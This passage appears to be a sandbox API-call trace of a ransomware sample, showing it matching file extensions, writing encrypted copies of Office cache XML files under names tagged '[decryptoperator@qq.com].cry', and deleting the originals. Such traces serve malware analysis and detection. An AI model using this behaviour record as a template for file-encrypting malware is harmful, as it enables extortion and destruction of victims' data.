3 [0035.681] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.681] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0035.681] lstrlenW (lpString=".dbf") returned 4 [0035.681] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.681] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0035.681] lstrlenW (lpString=".1cd") returned 4 [0035.681] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.681] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0035.681] lstrlenW (lpString=".jpg") returned 4 [0035.681] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.681] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0035.681] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0035.681] lstrlenW (lpString=".doc") returned 4 [0035.681] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.681] lstrlenW (lpString=".docx") returned 5 [0035.681] lstrcmpiW (lpString1=".docx", lpString2="f.xml") returned -1 [0035.681] lstrlenW (lpString=".pdf") returned 4 [0035.681] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.681] lstrlenW (lpString=".xls") returned 4 [0035.681] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.681] lstrlenW (lpString=".xlsx") returned 5 [0035.681] lstrcmpiW (lpString1=".xlsx", lpString2="f.xml") returned -1 [0035.681] lstrlenW (lpString=".ppt") returned 4 [0035.681] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.681] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0035.681] lstrlenW (lpString=".zip") returned 4 [0035.681] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.681] lstrlenW (lpString=".rar") returned 4 [0035.681] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.681] lstrlenW (lpString=".bz2") returned 4 [0035.681] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.681] lstrlenW (lpString=".7z") returned 3 [0035.681] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.681] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0035.681] lstrlenW (lpString=".dbf") returned 4 [0035.681] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.681] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0035.681] lstrlenW (lpString=".1cd") returned 4 [0035.682] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.682] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 81 [0035.682] lstrlenW (lpString=".jpg") returned 4 [0035.682] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.682] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0035.682] lstrlenW (lpString="Office32MUI.xml") returned 15 [0035.682] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0035.682] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=1383) returned 1 [0035.683] CloseHandle (hObject=0x170) returned 1 [0035.683] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml")) returned 0x2020 [0035.683] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.683] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0035.683] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.683] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.683] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0035.683] GetLastError () returned 0x0 [0035.683] ReadFile (in: hFile=0x170, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x567, lpOverlapped=0x0) returned 1 [0035.813] WriteFile (in: hFile=0x174, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x570, lpOverlapped=0x0) returned 1 [0035.813] ReadFile (in: hFile=0x170, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.814] WriteFile (in: hFile=0x174, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xf2, lpOverlapped=0x0) returned 1 [0035.814] SetEndOfFile (hFile=0x174) returned 1 [0035.814] CloseHandle (hObject=0x174) returned 1 [0035.814] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.814] SetEndOfFile (hFile=0x170) returned 1 [0035.815] CloseHandle (hObject=0x170) returned 1 [0035.815] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0035.815] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml")) returned 1 [0035.816] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0035.816] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0035.816] lstrlenW (lpString=".doc") returned 4 [0035.816] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.816] lstrlenW (lpString=".docx") returned 5 [0035.816] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.816] lstrlenW (lpString=".pdf") returned 4 [0035.816] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.816] lstrlenW (lpString=".xls") returned 4 [0035.816] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.816] lstrlenW (lpString=".xlsx") returned 5 [0035.816] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.816] lstrlenW (lpString=".ppt") returned 4 [0035.816] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.816] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0035.816] lstrlenW (lpString=".zip") returned 4 [0035.816] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.816] lstrlenW (lpString=".rar") returned 4 [0035.816] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.816] lstrlenW (lpString=".bz2") returned 4 [0035.816] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.816] lstrlenW (lpString=".7z") returned 3 [0035.816] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.816] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0035.816] lstrlenW (lpString=".dbf") returned 4 [0035.816] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.816] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0035.816] lstrlenW (lpString=".1cd") returned 4 [0035.816] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.816] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0035.816] lstrlenW (lpString=".jpg") returned 4 [0035.816] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.816] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0035.816] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0035.816] lstrlenW (lpString=".doc") returned 4 [0035.817] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.817] lstrlenW (lpString=".docx") returned 5 [0035.817] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.817] lstrlenW (lpString=".pdf") returned 4 [0035.817] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.817] lstrlenW (lpString=".xls") returned 4 [0035.817] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.817] lstrlenW (lpString=".xlsx") returned 5 [0035.817] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.817] lstrlenW (lpString=".ppt") returned 4 [0035.817] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.817] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0035.817] lstrlenW (lpString=".zip") returned 4 [0035.817] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.817] lstrlenW (lpString=".rar") returned 4 [0035.817] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.817] lstrlenW (lpString=".bz2") returned 4 [0035.817] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.817] lstrlenW (lpString=".7z") returned 3 [0035.817] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.817] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0035.817] lstrlenW (lpString=".dbf") returned 4 [0035.817] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.817] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0035.817] lstrlenW (lpString=".1cd") returned 4 [0035.817] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.817] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0035.817] lstrlenW (lpString=".jpg") returned 4 [0035.817] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.817] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0035.817] lstrlenW (lpString="Setup.xml") returned 9 [0035.817] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0035.902] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=6241) returned 1 [0035.902] CloseHandle (hObject=0x188) returned 1 [0035.902] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0035.902] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.902] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0035.902] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.902] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.902] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0036.232] GetLastError () returned 0x0 [0036.232] ReadFile (in: hFile=0x188, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x1861, lpOverlapped=0x0) returned 1 [0036.233] WriteFile (in: hFile=0x1b4, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x1870, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x1870, lpOverlapped=0x0) returned 1 [0036.234] ReadFile (in: hFile=0x188, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0036.234] WriteFile (in: hFile=0x1b4, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0036.234] SetEndOfFile (hFile=0x1b4) returned 1 [0036.235] CloseHandle (hObject=0x1b4) returned 1 [0036.235] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.235] SetEndOfFile (hFile=0x188) returned 1 [0036.236] CloseHandle (hObject=0x188) returned 1 [0036.236] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0036.236] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0036.237] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.237] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.237] lstrlenW (lpString=".doc") returned 4 [0036.237] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.237] lstrlenW (lpString=".docx") returned 5 [0036.237] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0036.237] lstrlenW (lpString=".pdf") returned 4 [0036.237] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.237] lstrlenW (lpString=".xls") returned 4 [0036.237] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.237] lstrlenW (lpString=".xlsx") returned 5 [0036.237] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0036.237] lstrlenW (lpString=".ppt") returned 4 [0036.237] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.237] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.237] lstrlenW (lpString=".zip") returned 4 [0036.237] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.237] lstrlenW (lpString=".rar") returned 4 [0036.237] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.237] lstrlenW (lpString=".bz2") returned 4 [0036.237] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.237] lstrlenW (lpString=".7z") returned 3 [0036.237] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.237] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.237] lstrlenW (lpString=".dbf") returned 4 [0036.237] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.237] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.237] lstrlenW (lpString=".1cd") returned 4 [0036.237] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.237] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.237] lstrlenW (lpString=".jpg") returned 4 [0036.237] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.238] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.238] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.238] lstrlenW (lpString=".doc") returned 4 [0036.238] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.238] lstrlenW (lpString=".docx") returned 5 [0036.238] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0036.238] lstrlenW (lpString=".pdf") returned 4 [0036.238] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.238] lstrlenW (lpString=".xls") returned 4 [0036.238] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.238] lstrlenW (lpString=".xlsx") returned 5 [0036.238] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0036.238] lstrlenW (lpString=".ppt") returned 4 [0036.238] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.238] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.238] lstrlenW (lpString=".zip") returned 4 [0036.238] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.238] lstrlenW (lpString=".rar") returned 4 [0036.238] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.238] lstrlenW (lpString=".bz2") returned 4 [0036.238] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.238] lstrlenW (lpString=".7z") returned 3 [0036.238] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.238] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.238] lstrlenW (lpString=".dbf") returned 4 [0036.238] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.238] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.238] lstrlenW (lpString=".1cd") returned 4 [0036.238] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.238] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.238] lstrlenW (lpString=".jpg") returned 4 [0036.238] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.239] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0036.239] lstrlenW (lpString="branding.xml") returned 12 [0036.239] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0036.239] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=596341) returned 1 [0036.239] CloseHandle (hObject=0x188) returned 1 [0036.239] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml")) returned 0x2020 [0036.239] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0036.239] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0036.239] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.239] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.240] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0036.240] GetLastError () returned 0x0 [0036.240] ReadFile (in: hFile=0x188, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x91975, lpOverlapped=0x0) returned 1 [0036.282] WriteFile (in: hFile=0x1b4, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x91980, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x91980, lpOverlapped=0x0) returned 1 [0036.295] ReadFile (in: hFile=0x188, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0036.295] WriteFile (in: hFile=0x1b4, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0036.295] SetEndOfFile (hFile=0x1b4) returned 1 [0036.295] CloseHandle (hObject=0x1b4) returned 1 [0036.301] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.301] SetEndOfFile (hFile=0x188) returned 1 [0036.305] CloseHandle (hObject=0x188) returned 1 [0036.305] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0036.306] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml")) returned 1 [0036.306] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0036.306] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0036.306] lstrlenW (lpString=".doc") returned 4 [0036.306] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.306] lstrlenW (lpString=".docx") returned 5 [0036.306] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0036.306] lstrlenW (lpString=".pdf") returned 4 [0036.306] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.306] lstrlenW (lpString=".xls") returned 4 [0036.306] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.306] lstrlenW (lpString=".xlsx") returned 5 [0036.306] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0036.306] lstrlenW (lpString=".ppt") returned 4 [0036.306] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.306] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0036.306] lstrlenW (lpString=".zip") returned 4 [0036.306] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 